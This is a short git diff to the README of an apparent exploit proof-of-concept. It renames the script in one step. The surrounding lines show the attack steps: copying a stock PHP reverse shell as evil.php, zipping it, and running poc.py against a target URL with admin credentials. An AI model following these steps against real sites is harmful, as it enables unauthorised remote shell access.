--- a/README.org
+++ b/README.org
@@ -13,7 +13,7 @@ cp /usr/share/webshells/php/php-reverse-shell.php ~/path/to/your/likings/evil.ph
    #+begin_src
 zip exploit.zip evil.php
    #+end_src
-3. run =exp.py=.
+3. run =poc.py=.
   #+BEGIN_SRC bash
   python3 poc.py --url=example.nl -u admin -p admin123
   #+END_SRC
